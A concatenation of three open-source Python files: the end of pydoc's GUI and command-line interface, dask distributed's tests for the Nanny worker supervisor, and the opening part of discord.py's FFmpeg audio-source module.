self.bigheight = self.window.winfo_height()
self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight))
self.window.wm_minsize(self.minwidth, self.minheight)
self.expanded = 0
def expand(self):
if self.expanded: return
self.result_frm.pack(side='bottom', fill='x')
self.result_scr.pack(side='right', fill='y')
self.result_lst.pack(side='top', fill='both', expand=1)
self.window.wm_geometry('%dx%d' % (self.bigwidth, self.bigheight))
self.window.wm_minsize(self.minwidth, self.bigminheight)
self.expanded = 1
def hide(self, event=None):
self.stop()
self.collapse()
import Tkinter
try:
root = Tkinter.Tk()
# Tk will crash if pythonw.exe has an XP .manifest
# file and the root has is not destroyed explicitly.
# If the problem is ever fixed in Tk, the explicit
# destroy can go.
try:
gui = GUI(root)
root.mainloop()
finally:
root.destroy()
except KeyboardInterrupt:
pass
# -------------------------------------------------- command-line interface
def ispath(x):
return isinstance(x, str) and find(x, os.sep) >= 0
def cli():
"""Command-line interface (looks at sys.argv to decide what to do)."""
import getopt
class BadUsage: pass
# Scripts don't get the current directory in their path by default
# unless they are run with the '-m' switch
if '' not in sys.path:
scriptdir = os.path.dirname(sys.argv[0])
if scriptdir in sys.path:
sys.path.remove(scriptdir)
sys.path.insert(0, '.')
try:
opts, args = getopt.getopt(sys.argv[1:], 'gk:p:w')
writing = 0
for opt, val in opts:
if opt == '-g':
gui()
return
if opt == '-k':
apropos(val)
return
if opt == '-p':
try:
port = int(val)
except ValueError:
raise BadUsage
def ready(server):
print 'pydoc server ready at %s' % server.url
def stopped():
print 'pydoc server stopped'
serve(port, ready, stopped)
return
if opt == '-w':
writing = 1
if not args: raise BadUsage
for arg in args:
if ispath(arg) and not os.path.exists(arg):
print 'file %r does not exist' % arg
break
try:
if ispath(arg) and os.path.isfile(arg):
arg = importfile(arg)
if writing:
if ispath(arg) and os.path.isdir(arg):
writedocs(arg)
else:
writedoc(arg)
else:
help.help(arg)
except ErrorDuringImport, value:
print value
except (getopt.error, BadUsage):
cmd = os.path.basename(sys.argv[0])
print """pydoc - the Python documentation tool
%s <name> ...
Show text documentation on something. <name> may be the name of a
Python keyword, topic, function, module, or package, or a dotted
reference to a class or function within a module or module in a
package. If <name> contains a '%s', it is used as the path to a
Python source file to document. If name is 'keywords', 'topics',
or 'modules', a listing of these things is displayed.
%s -k <keyword>
Search for a keyword in the synopsis lines of all available modules.
%s -p <port>
Start an HTTP server on the given port on the local machine.
%s -g
Pop up a graphical interface for finding and serving documentation.
%s -w <name> ...
Write out the HTML documentation for a module to a file in the current
directory. If <name> contains a '%s', it is treated as a filename; if
it names a directory, documentation is written for all the contents.
""" % (cmd, os.sep, cmd, cmd, cmd, cmd, os.sep)
if __name__ == '__main__': cli()
|
test_nanny.py
|
import asyncio
from contextlib import suppress
import gc
import logging
import os
import random
import sys
import multiprocessing as mp
import numpy as np
import pytest
from tlz import valmap, first
from tornado.ioloop import IOLoop
import dask
from distributed.diagnostics import SchedulerPlugin
from distributed import Nanny, rpc, Scheduler, Worker, Client, wait, worker
from distributed.core import CommClosedError
from distributed.metrics import time
from distributed.protocol.pickle import dumps
from distributed.utils import tmpfile, TimeoutError, parse_ports
from distributed.utils_test import ( # noqa: F401
gen_cluster,
gen_test,
inc,
captured_logger,
cleanup,
)
# FIXME why does this leave behind unclosed Comm objects?
@gen_cluster(nthreads=[], allow_unclosed=True)
async def test_nanny(s):
async with Nanny(s.address, nthreads=2, loop=s.loop) as n:
async with rpc(n.address) as nn:
assert n.is_alive()
[ws] = s.workers.values()
assert ws.nthreads == 2
assert ws.nanny == n.address
await nn.kill()
assert not n.is_alive()
start = time()
while n.worker_address in s.workers:
assert time() < start + 1
await asyncio.sleep(0.01)
await nn.kill()
assert not n.is_alive()
assert n.worker_address not in s.workers
await nn.instantiate()
assert n.is_alive()
[ws] = s.workers.values()
assert ws.nthreads == 2
assert ws.nanny == n.address
await nn.terminate()
assert not n.is_alive()
@gen_cluster(nthreads=[])
async def test_many_kills(s):
n = await Nanny(s.address, nthreads=2, loop=s.loop)
assert n.is_alive()
await asyncio.gather(*(n.kill() for _ in range(5)))
await asyncio.gather(*(n.kill() for _ in range(5)))
await n.close()
@gen_cluster(Worker=Nanny)
async def test_str(s, a, b):
assert a.worker_address in str(a)
assert a.worker_address in repr(a)
assert str(a.nthreads) in str(a)
assert str(a.nthreads) in repr(a)
@gen_cluster(nthreads=[], timeout=20, client=True)
async def test_nanny_process_failure(c, s):
n = await Nanny(s.address, nthreads=2, loop=s.loop)
first_dir = n.worker_dir
assert os.path.exists(first_dir)
original_address = n.worker_address
ww = rpc(n.worker_address)
await ww.update_data(data=valmap(dumps, {"x": 1, "y": 2}))
pid = n.pid
assert pid is not None
with suppress(CommClosedError):
await c.run(os._exit, 0, workers=[n.worker_address])
start = time()
while n.pid == pid: # wait while process dies and comes back
await asyncio.sleep(0.01)
assert time() - start < 5
start = time()
await asyncio.sleep(1)
while not n.is_alive(): # wait while process comes back
await asyncio.sleep(0.01)
assert time() - start < 5
# assert n.worker_address != original_address # most likely
start = time()
while n.worker_address not in s.nthreads or n.worker_dir is None:
await asyncio.sleep(0.01)
assert time() - start < 5
second_dir = n.worker_dir
await n.close()
assert not os.path.exists(second_dir)
assert not os.path.exists(first_dir)
assert first_dir != n.worker_dir
await ww.close_rpc()
s.stop()
@gen_cluster(nthreads=[])
async def test_run(s):
pytest.importorskip("psutil")
n = await Nanny(s.address, nthreads=2, loop=s.loop)
with rpc(n.address) as nn:
response = await nn.run(function=dumps(lambda: 1))
assert response["status"] == "OK"
assert response["result"] == 1
await n.close()
@pytest.mark.slow
@gen_cluster(config={"distributed.comm.timeouts.connect": "1s"})
async def test_no_hang_when_scheduler_closes(s, a, b):
# https://github.com/dask/distributed/issues/2880
with captured_logger("tornado.application", logging.ERROR) as logger:
await s.close()
await asyncio.sleep(1.2)
assert a.status == "closed"
assert b.status == "closed"
out = logger.getvalue()
assert "Timed out trying to connect" not in out
@pytest.mark.slow
@gen_cluster(
Worker=Nanny, nthreads=[("127.0.0.1", 1)], worker_kwargs={"reconnect": False}
)
async def test_close_on_disconnect(s, w):
await s.close()
start = time()
while w.status != "closed":
await asyncio.sleep(0.05)
assert time() < start + 9
class Something(Worker):
# a subclass of Worker which is not Worker
pass
@gen_cluster(client=True, Worker=Nanny)
async def test_nanny_worker_class(c, s, w1, w2):
out = await c._run(lambda dask_worker=None: str(dask_worker.__class__))
assert "Worker" in list(out.values())[0]
assert w1.Worker is Worker
@gen_cluster(client=True, Worker=Nanny, worker_kwargs={"worker_class": Something})
async def test_nanny_alt_worker_class(c, s, w1, w2):
out = await c._run(lambda dask_worker=None: str(dask_worker.__class__))
assert "Something" in list(out.values())[0]
assert w1.Worker is Something
@pytest.mark.slow
@gen_cluster(client=False, nthreads=[])
async def test_nanny_death_timeout(s):
await s.close()
w = Nanny(s.address, death_timeout=1)
with pytest.raises(TimeoutError):
await w
assert w.status == "closed"
@gen_cluster(client=True, Worker=Nanny)
async def test_random_seed(c, s, a, b):
async def check_func(func):
x = c.submit(func, 0, 2 ** 31, pure=False, workers=a.worker_address)
y = c.submit(func, 0, 2 ** 31, pure=False, workers=b.worker_address)
assert x.key != y.key
x = await x
y = await y
assert x != y
await check_func(lambda a, b: random.randint(a, b))
await check_func(lambda a, b: np.random.randint(a, b))
@pytest.mark.skipif(
sys.platform.startswith("win"), reason="num_fds not supported on windows"
)
@gen_cluster(client=False, nthreads=[])
async def test_num_fds(s):
psutil = pytest.importorskip("psutil")
proc = psutil.Process()
# Warm up
w = await Nanny(s.address)
await w.close()
del w
gc.collect()
before = proc.num_fds()
for i in range(3):
w = await Nanny(s.address)
await asyncio.sleep(0.1)
await w.close()
start = time()
while proc.num_fds() > before:
print("fds:", before, proc.num_fds())
await asyncio.sleep(0.1)
assert time() < start + 10
@pytest.mark.skipif(
not sys.platform.startswith("linux"), reason="Need 127.0.0.2 to mean localhost"
)
@gen_cluster(client=True, nthreads=[])
async def test_worker_uses_same_host_as_nanny(c, s):
for host in ["tcp://0.0.0.0", "tcp://127.0.0.2"]:
n = await Nanny(s.address, host=host)
def func(dask_worker):
return dask_worker.listener.listen_address
result = await c.run(func)
assert host in first(result.values())
await n.close()
@gen_test()
async def test_scheduler_file():
with tmpfile() as fn:
s = await Scheduler(scheduler_file=fn, port=8008)
w = await Nanny(scheduler_file=fn)
assert set(s.workers) == {w.worker_address}
await w.close()
s.stop()
@gen_cluster(client=True, Worker=Nanny, nthreads=[("127.0.0.1", 2)])
async def test_nanny_timeout(c, s, a):
x = await c.scatter(123)
with captured_logger(
logging.getLogger("distributed.nanny"), level=logging.ERROR
) as logger:
response = await a.restart(timeout=0.1)
out = logger.getvalue()
assert "timed out" in out.lower()
start = time()
while x.status != "cancelled":
await asyncio.sleep(0.1)
assert time() < start + 7
@gen_cluster(
nthreads=[("127.0.0.1", 1)],
client=True,
Worker=Nanny,
worker_kwargs={"memory_limit": 1e8},
timeout=20,
clean_kwargs={"threads": False},
)
async def test_nanny_terminate(c, s, a):
from time import sleep
def leak():
L = []
while True:
L.append(b"0" * 5000000)
sleep(0.01)
proc = a.process.pid
with captured_logger(logging.getLogger("distributed.nanny")) as logger:
future = c.submit(leak)
start = time()
while a.process.pid == proc:
await asyncio.sleep(0.1)
assert time() < start + 10
out = logger.getvalue()
assert "restart" in out.lower()
assert "memory" in out.lower()
@gen_cluster(
nthreads=[("127.0.0.1", 1)] * 8,
client=True,
Worker=Worker,
clean_kwargs={"threads": False},
)
async def test_throttle_outgoing_connections(c, s, a, *workers):
# But a bunch of small data on worker a
await c.run(lambda: logging.getLogger("distributed.worker").setLevel(logging.DEBUG))
remote_data = c.map(
lambda x: b"0" * 10000, range(10), pure=False, workers=[a.address]
)
await wait(remote_data)
def pause(dask_worker):
# Patch paused and memory_monitor on the one worker
# This is is very fragile, since a refactor of memory_monitor to
# remove _memory_monitoring will break this test.
dask_worker._memory_monitoring = True
dask_worker.paused = True
dask_worker.outgoing_current_count = 2
await c.run(pause, workers=[a.address])
requests = [
await a.get_data(await w.rpc.connect(w.address), keys=[f.key], who=w.address)
for w in workers
for f in remote_data
]
await wait(requests)
wlogs = await c.get_worker_logs(workers=[a.address])
wlogs = "\n".join(x[1] for x in wlogs[a.address])
assert "throttling" in wlogs.lower()
@gen_cluster(nthreads=[], client=True)
async def test_avoid_memory_monitor_if_zero_limit(c, s):
nanny = await Nanny(s.address, loop=s.loop, memory_limit=0)
typ = await c.run(lambda dask_worker: type(dask_worker.data))
assert typ == {nanny.worker_address: dict}
pcs = await c.run(lambda dask_worker: list(dask_worker.periodic_callbacks))
assert "memory" not in pcs
assert "memory" not in nanny.periodic_callbacks
future = c.submit(inc, 1)
assert await future == 2
await asyncio.sleep(0.02)
await c.submit(inc, 2) # worker doesn't pause
await nanny.close()
@gen_cluster(nthreads=[], client=True)
async def test_scheduler_address_config(c, s):
with dask.config.set({"scheduler-address": s.address}):
nanny = await Nanny(loop=s.loop)
assert nanny.scheduler.address == s.address
start = time()
while not s.workers:
await asyncio.sleep(0.1)
assert time() < start + 10
await nanny.close()
@pytest.mark.slow
@gen_test(timeout=20)
async def test_wait_for_scheduler():
with captured_logger("distributed") as log:
w = Nanny("127.0.0.1:44737")
IOLoop.current().add_callback(w.start)
await asyncio.sleep(6)
await w.close()
log = log.getvalue()
assert "error" not in log.lower(), log
assert "restart" not in log.lower(), log
@gen_cluster(nthreads=[], client=True)
async def test_environment_variable(c, s):
a = Nanny(s.address, loop=s.loop, memory_limit=0, env={"FOO": "123"})
b = Nanny(s.address, loop=s.loop, memory_limit=0, env={"FOO": "456"})
await asyncio.gather(a, b)
results = await c.run(lambda: os.environ["FOO"])
assert results == {a.worker_address: "123", b.worker_address: "456"}
await asyncio.gather(a.close(), b.close())
@gen_cluster(nthreads=[], client=True)
async def test_data_types(c, s):
w = await Nanny(s.address, data=dict)
r = await c.run(lambda dask_worker: type(dask_worker.data))
assert r[w.worker_address] == dict
await w.close()
@gen_cluster(nthreads=[])
async def test_local_directory(s):
with tmpfile() as fn:
with dask.config.set(temporary_directory=fn):
w = await Nanny(s.address)
assert w.local_directory.startswith(fn)
assert "dask-worker-space" in w.local_directory
await w.close()
def _noop(x):
"""Define here because closures aren't pickleable."""
pass
@gen_cluster(
nthreads=[("127.0.0.1", 1)],
client=True,
Worker=Nanny,
config={"distributed.worker.daemon": False},
)
async def test_mp_process_worker_no_daemon(c, s, a):
def multiprocessing_worker():
p = mp.Process(target=_noop, args=(None,))
p.start()
p.join()
await c.submit(multiprocessing_worker)
@gen_cluster(
nthreads=[("127.0.0.1", 1)],
client=True,
Worker=Nanny,
config={"distributed.worker.daemon": False},
)
async def test_mp_pool_worker_no_daemon(c, s, a):
def pool_worker(world_size):
with mp.Pool(processes=world_size) as p:
p.map(_noop, range(world_size))
await c.submit(pool_worker, 4)
@pytest.mark.asyncio
async def test_nanny_closes_cleanly(cleanup):
async with Scheduler() as s:
n = await Nanny(s.address)
assert n.process.pid
proc = n.process.process
await n.close()
assert not n.process
assert not proc.is_alive()
assert proc.exitcode == 0
@pytest.mark.slow
@pytest.mark.asyncio
async def test_lifetime(cleanup):
counter = 0
event = asyncio.Event()
class Plugin(SchedulerPlugin):
def add_worker(self, **kwargs):
pass
def remove_worker(self, **kwargs):
nonlocal counter
counter += 1
if counter == 2: # wait twice, then trigger closing event
event.set()
async with Scheduler() as s:
s.add_plugin(Plugin())
async with Nanny(s.address) as a:
async with Nanny(s.address, lifetime="500 ms", lifetime_restart=True) as b:
await event.wait()
@pytest.mark.asyncio
async def test_nanny_closes_cleanly(cleanup):
async with Scheduler() as s:
async with Nanny(s.address) as n:
async with Client(s.address, asynchronous=True) as client:
with client.rpc(n.worker_address) as w:
IOLoop.current().add_callback(w.terminate)
start = time()
while n.status != "closed":
await asyncio.sleep(0.01)
assert time() < start + 5
assert n.status == "closed"
@pytest.mark.asyncio
async def test_config(cleanup):
async with Scheduler() as s:
async with Nanny(s.address, config={"foo": "bar"}) as n:
async with Client(s.address, asynchronous=True) as client:
config = await client.run(dask.config.get, "foo")
assert config[n.worker_address] == "bar"
@pytest.mark.asyncio
async def test_nanny_port_range(cleanup):
async with Scheduler() as s:
async with Client(s.address, asynchronous=True) as client:
nanny_port = "9867:9868"
worker_port = "9869:9870"
async with Nanny(s.address, port=nanny_port, worker_port=worker_port) as n1:
assert n1.port == 9867 # Selects first port in range
async with Nanny(
s.address, port=nanny_port, worker_port=worker_port
) as n2:
assert n2.port == 9868 # Selects next port in range
with pytest.raises(
ValueError, match="Could not start Nanny"
): # No more ports left
async with Nanny(
s.address, port=nanny_port, worker_port=worker_port
):
pass
# Ensure Worker ports are in worker_port range
def get_worker_port(dask_worker):
return dask_worker.port
worker_ports = await client.run(get_worker_port)
assert list(worker_ports.values()) == parse_ports(worker_port)
class KeyboardInterruptWorker(worker.Worker):
"""A Worker that raises KeyboardInterrupt almost immediately"""
async def heartbeat(self):
def raise_err():
raise KeyboardInterrupt()
self.loop.add_callback(raise_err)
@pytest.mark.parametrize("protocol", ["tcp", "ucx"])
@pytest.mark.asyncio
async def test_nanny_closed_by_keyboard_interrupt(cleanup, protocol):
if protocol == "ucx": # Skip if UCX isn't available
pytest.importorskip("ucp")
async with Scheduler(protocol=protocol) as s:
async with Nanny(
s.address, nthreads=1, worker_class=KeyboardInterruptWorker
) as n:
n.auto_restart = False
await n.process.stopped.wait()
# Check that the scheduler has been notified about the closed worker
assert len(s.workers) == 0
|
player.py
|
"""
The MIT License (MIT)
Copyright (c) 2015-present Rapptz
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
from __future__ import annotations
import threading
import traceback
import subprocess
import audioop
import asyncio
import logging
import shlex
import time
import json
import sys
import re
import io
from typing import Any, Callable, Generic, IO, Optional, TYPE_CHECKING, Tuple, Type, TypeVar, Union
from . import utils
from .errors import ClientException
from .opus import Encoder as OpusEncoder
from .oggparse import OggStream
if TYPE_CHECKING:
from .voice_client import VoiceClient
MISSING = utils.MISSING
AT = TypeVar("AT", bound="AudioSource")
FT = TypeVar("FT", bound="FFmpegOpusAudio")
_log = logging.getLogger(__name__)
__all__ = (
"AudioSource",
"PCMAudio",
"FFmpegAudio",
"FFmpegPCMAudio",
"FFmpegOpusAudio",
"PCMVolumeTransformer",
)
CREATE_NO_WINDOW: int
if sys.platform != "win32":
CREATE_NO_WINDOW = 0
else:
CREATE_NO_WINDOW = 0x08000000
class AudioSource:
"""Represents an audio stream.
The audio stream can be Opus encoded or not, however if the audio stream
is not Opus encoded then the audio format must be 16-bit 48KHz stereo PCM.
.. warning::
The audio source reads are done in a separate thread.
"""
def read(self) -> bytes:
"""Reads 20ms worth of audio.
Subclasses must implement this.
If the audio is complete, then returning an empty
:term:`py:bytes-like object` to signal this is the way to do so.
If :meth:`~AudioSource.is_opus` method returns ``True``, then it must return
20ms worth of Opus encoded audio. Otherwise, it must be 20ms
worth of 16-bit 48KHz stereo PCM, which is about 3,840 bytes
per frame (20ms worth of audio).
Returns
--------
:class:`bytes`
A bytes like object that represents the PCM or Opus data.
"""
raise NotImplementedError
def is_opus(self) -> bool:
"""Checks if the audio source is already encoded in Opus."""
return False
def cleanup(self) -> None:
"""Called when clean-up is needed to be done.
Useful for clearing buffer data or processes after
it is done playing audio.
"""
pass
def __del__(self) -> None:
self.cleanup()
class PCMAudio(AudioSource):
"""Represents raw 16-bit 48KHz stereo PCM audio source.
Attributes
-----------
stream: :term:`py:file object`
A file-like object that reads byte data representing raw PCM.
"""
def __init__(self, stream: io.BufferedIOBase) -> None:
self.stream: io.BufferedIOBase = stream
def read(self) -> bytes:
ret = self.stream.read(OpusEncoder.FRAME_SIZE)
if len(ret) != OpusEncoder.FRAME_SIZE:
return b""
return ret
class FFmpegAudio(AudioSource):
"""Represents an FFmpeg (or AVConv) based AudioSource.
User created AudioSources using FFmpeg differently from how :class:`FFmpegPCMAudio` and
:class:`FFmpegOpusAudio` work should subclass this.
.. versionadded:: 1.3
"""
def __init__(
self,
source: Union[str, io.BufferedIOBase],
*,
executable: str = "ffmpeg",
args: Any,
**subprocess_kwargs: Any,
):
piping = subprocess_kwargs.get("stdin") == subprocess.PIPE
if piping and isinstance(source, str):
raise TypeError(
"parameter conflict: 'source' parameter cannot be a string when piping to stdin"
)
args = [executable, *args]
kwargs = {"stdout": subprocess.PIPE}
kwargs.update(subprocess_kwargs)
self._process: subprocess.Popen = self._spawn_process(args, **kwargs)
self._stdout: IO[bytes] = self._process.stdout # type: ignore
self._stdin: Optional[IO[Bytes]] = None
self._pipe_thread: Optional[threading.Thread] = None
if piping:
n = f"popen-stdin-writer:{id(self):#x}"
self._stdin = self._process.stdin
self._pipe_thread = threading.Thread(
target=self._pipe_writer, args=(source,), daemon=True, name=n
)
self._pipe_thread.start()
def _spawn_process(self, args: Any, **subprocess_kwargs: Any) -> subprocess.Popen:
process = None
try:
process = subprocess.Popen(args, creationflags=CREATE_NO_WINDOW, **subprocess_kwargs)
except FileNotFoundError:
executable = args.partition(" ")[0] if isinstance(args, str) else args[0]
raise ClientException(executable + " was not found.") from None
except subprocess.SubprocessError as exc:
raise ClientException(f"Popen failed: {exc.__class__.__name__}: {exc}") from exc
else:
return process
def _kill_process(self) -> None:
proc = self._process
if proc is MISSING:
return
_log.info("Preparing to terminate ffmpeg process %s.", proc.pid)
try:
proc.kill()
except Exception:
_log.exception("Ignoring error attempting to kill ffmpeg process %s", proc.pid)
if proc.poll() is None:
_log.info("ffmpeg process %s has not terminated. Waiting to terminate...", proc.pid)
proc.communicate()
_log.info(
"ffmpeg process %s should have terminated with a return code of %s.",
proc.pid,
proc.returncode,
)
else:
_log.info(
"ffmpeg process %s successfully terminated with return code of %s.",
proc.pid,
proc.returncode,
)
def _pipe_writer(self, source: io.BufferedIOBase) -> None:
while self._process:
# arbitrarily large read size
data = source.read(8192)
if not data:
self._process.terminate()
return
try:
self._stdin.write(data)
except Exception:
_log.debug(
"Write error for %s, this is probably not a problem", self, exc_info=True
)
# at this point the source data is either exhausted or the process is fubar
self._process.terminate()
return
def check_streams(self) -> None:
if self._process is MISSING or self._stdout is MISSING or self._stdin is MISSING:
raise ValueError("FFmpegAudio cannot be read more than once")
def cleanup(self) -> None:
self._kill_process()
self._process = self._stdout = self._stdin = MISSING
class FFmpegPCMAudio(FFmpegAudio):
"""An audio source from FFmpeg (or AVConv).
This launches a sub-process to a specific input file given.
.. warning::
You must have the ffmpeg or avconv executable in your path environment
variable in order for this to work.
Parameters
------------
source: Union[:class:`str`, :class:`io.BufferedIOBase`]
The input that ffmpeg will take and convert to PCM bytes.
If ``pipe`` is ``True`` then this is a file-like object that is
passed to the stdin of ffmpeg.
executable: :class:`str`
The executable name (and path) to use. Defaults to ``ffmpeg``.
pipe: :class:`bool`
If ``True``, denotes that ``source`` parameter will be passed
to the stdin of ffmpeg. Defaults to ``False``.
stderr: Optional[:term:`py:file object`]
A file-like object to pass to the Popen constructor.
Could also be an instance of ``subprocess.PIPE``.
before_options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg before the ``-i`` flag.
options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg after the ``-i`` flag.
Raises
--------
ClientException
The subprocess failed to be created.
"""
def __init__(
self,
source: Union[str, io.BufferedIOBase],
*,
executable: str = "ffmpeg",
pipe: bool = False,
stderr: Optional[IO[str]] = None,
before_options: Optional[str] = None,
options: Optional[str] = None,
) -> None:
args = []
subprocess_kwargs = {
"stdin": subprocess.PIPE if pipe else subprocess.DEVNULL,
"stderr": stderr,
}
if isinstance(before_options, str):
args.extend(shlex.split(before_options))
args.append("-i")
args.append("-" if pipe else source)
args.extend(("-f", "s16le", "-ar", "48000", "-ac", "2", "-loglevel", "warning"))
if isinstance(options, str):
args.extend(shlex.split(options))
args.append("pipe:1")
super().__init__(source, executable=executable, args=args, **subprocess_kwargs)
def read(self) -> bytes:
# self.check_streams()
ret = self._stdout.read(OpusEncoder.FRAME_SIZE)
if len(ret) != OpusEncoder.FRAME_SIZE:
return b""
return ret
def is_opus(self) -> bool:
return False
class FFmpegOpusAudio(FFmpegAudio):
"""An audio source from FFmpeg (or AVConv).
This launches a sub-process to a specific input file given. However, rather than
producing PCM packets like :class:`FFmpegPCMAudio` does that need to be encoded to
Opus, this class produces Opus packets, skipping the encoding step done by the library.
Alternatively, instead of instantiating this class directly, you can use
:meth:`FFmpegOpusAudio.from_probe` to probe for bitrate and codec information. This
can be used to opportunistically skip pointless re-encoding of existing Opus audio data
for a boost in performance at the cost of a short initial delay to gather the information.
The same can be achieved by passing ``copy`` to the ``codec`` parameter, but only if you
know that the input source is Opus encoded beforehand.
.. versionadded:: 1.3
.. warning::
You must have the ffmpeg or avconv executable in your path environment
variable in order for this to work.
Parameters
------------
source: Union[:class:`str`, :class:`io.BufferedIOBase`]
The input that ffmpeg will take and convert to Opus bytes.
If ``pipe`` is ``True`` then this is a file-like object that is
passed to the stdin of ffmpeg.
bitrate: :class:`int`
The bitrate in kbps to encode the output to. Defaults to ``128``.
codec: Optional[:class:`str`]
The codec to use to encode the audio data. Normally this would be
just ``libopus``, but is used by :meth:`FFmpegOpusAudio.from_probe` to
opportunistically skip pointlessly re-encoding Opus audio data by passing
``copy`` as the codec value. Any values other than ``copy``, ``opus``, or
``libopus`` will be considered ``libopus``. Defaults to ``libopus``.
.. warning::
Do not provide this parameter unless you are certain that the audio input is
already Opus encoded. For typical use :meth:`FFmpegOpusAudio.from_probe`
should be used to determine the proper value for this parameter.
executable: :class:`str`
The executable name (and path) to use. Defaults to ``ffmpeg``.
pipe: :class:`bool`
If ``True``, denotes that ``source`` parameter will be passed
to the stdin of ffmpeg. Defaults to ``False``.
stderr: Optional[:term:`py:file object`]
A file-like object to pass to the Popen constructor.
Could also be an instance of ``subprocess.PIPE``.
before_options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg before the ``-i`` flag.
options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg after the ``-i`` flag.
Raises
--------
ClientException
The subprocess failed to be created.
"""
def __init__(
self,
source: Union[str, io.BufferedIOBase],
*,
bitrate: int = 128,
codec: Optional[str] = None,
executable: str = "ffmpeg",
pipe=False,
stderr=None,
before_options=None,
options=None,
) -> None:
args = []
subprocess_kwargs = {
"stdin": subprocess.PIPE if pipe else subprocess.DEVNULL,
"stderr": stderr,
}
if isinstance(before_options, str):
args.extend(shlex.split(before_options))
args.append("-i")
args.append("-" if pipe else source)
codec = "copy" if codec in ("opus", "libopus") else "libopus"
args.extend(
(
"-map_metadata",
"-1",
"-f",
"opus",
"-c:a",
codec,
"-ar",
"48000",
"-ac",
"2",
"-b:a",
f"{bitrate}k",
"-loglevel",
"warning",
)
)
if isinstance(options, str):
args.extend(shlex.split(options))
args.append("pipe:1")
super().__init__(source, executable=executable, args=args, **subprocess_kwargs)
self._packet_iter = OggStream(self._stdout).iter_packets()
@classmethod
async def from_probe(
cls: Type[FT],
source: str,
*,
method: Optional[
Union[str, Callable[[str, str], Tuple[Optional[str], Optional[int]]]]
] = None,
**kwargs: Any,
) -> FT:
"""|coro|
A factory method that creates a :class:`FFmpegOpusAudio` after probing
the input source for audio codec and bitrate information.
Examples
----------
Use this function to create an :class:`FFmpegOpusAudio` instance instead of the constructor: ::
source = await discord.FFmpegOpusAudio.from_probe("song.webm")
voice_client.play(source)
If you are on Windows and don't have ffprobe installed, use the ``fallback`` method
to probe using ffmpeg instead: ::
source = await discord.FFmpegOpusAudio.from_probe("song.webm", method='fallback')
voice_client.play(source)
Using a custom method of determining codec and bitrate: ::
def custom_probe(source, executable):
# some analysis code here
return codec, bitrate
source = await discord.FFmpegOpusAudio.from_probe("song.webm", method=custom_probe)
voice_client.play(source)
Parameters
------------
source
Identical to the ``source`` parameter for the constructor.
method: Optional[Union[:class:`str`, Callable[:class:`str`, :class:`str`]]]
The probing method used to determine bitrate and codec information. As a string, valid
values are ``native`` to use ffprobe (or avprobe) and ``fallback`` to use ffmpeg
(or avconv). As a callable, it must take two string arguments, ``source`` and
``executable``. Both parameters are the same values passed to this factory function.
``executable`` will default to ``ffmpeg`` if not provided as a keyword argument.
kwargs
The remaining parameters to be passed to the :class:`FFmpegOpusAudio` constructor,
excluding ``bitrate`` and ``codec``.
Raises
--------
AttributeError
Invalid probe method, must be ``'native'`` or ``'fallback'``.
TypeError
Invalid value for ``probe`` parameter, must be :class:`str` or a callable.
Returns
--------
:class:`FFmpegOpusAudio`
An instance of this class.
"""
executable = kwargs.get("executable")
codec, bitrate = await cls.probe(source, method=method, executable=executable)
return cls(source, bitrate=bitrate, codec=codec, **kwargs) # type: ignore
@classmethod
async def probe(
cls,
source: str,
*,
method: Optional[
Union[str, Callable[[str, str], Tuple[Optional[str], Optional[int]]]]
] = None,
executable: Optional[str] = None,
) -> Tuple[Optional[str], Optional[int]]:
"""|coro|
Probes the input source for bitrate and codec information.
Parameters
------------
source
Identical to the ``source`` parameter for :class:`FFmpegOpusAudio`.
method
Identical to the ``method`` parameter for :meth:`FFmpegOpusAudio.from_probe`.
executable: :class:`str`
Identical to the ``executable`` parameter for :class:`FFmpegOpusAudio`.
Raises
--------
AttributeError
Invalid probe method, must be ``'native'`` or ``'fallback'``.
TypeError
Invalid value for ``probe`` parameter, must be :class:`str` or a callable.
Returns
---------
Optional[Tuple[Optional[:class:`str`], Optional[:class:`int`]]]
A 2-tuple with the codec and bitrate of the input source.
"""
method = method or "native"
executable = executable or "ffmpeg"
probefunc = fallback = None
if isinstance(method, str):
probefunc = getattr(cls, "_probe_codec_" + method, None)
if probefunc is None:
raise AttributeError(f"Invalid probe method {method!r}")
if probefunc is cls._probe_codec_native:
fallback = cls._probe_codec_fallback
elif callable(method):
probefunc = method
fallback = cls._probe_codec_fallback
else:
raise TypeError(
"Expected str or callable for parameter 'probe', "
f"not '{method.__class__.__name__}'"
)
codec = bitrate = None
loop = asyncio.get_event_loop()
try:
codec, bitrate = await loop.run_in_executor(None, lambda: probefunc(source, executable)) # type: ignore
except Exception:
if not fallback:
_log.exception("Probe '%s' using '%s' failed", method, executable)
return # type: ignore
_log.exception("Probe '%s' using '%s' failed, trying fallback", method, executable)
try:
codec, bitrate = await loop.run_in_executor(None, lambda: fallback(source, executable)) # type: ignore
except Exception:
_log.exception("Fallback probe using '%s' failed", executable)
else:
_log.info("Fallback probe found codec=%s, bitrate=%s", codec, bitrate)
else:
_log.info("Probe found codec=%s, bitrate=%s", codec, bitrate)
finally:
return codec, bitrate
@staticmethod
def _probe_codec_native(
source, executable: str = "ffmpeg"
) -> Tuple[Optional[str], Optional[int]]:
exe = executable[:2] + "probe" if executable in ("ffmpeg", "avconv") else executable
args = [
exe,
"-v",
"quiet",
"-print_format",
"json",
"-show_streams",
"-select_streams",
"a:0",
source,
]
output = subprocess.check_output(args, timeout=20)
codec = bitrate = None
if output:
data = utils._from_json(output)
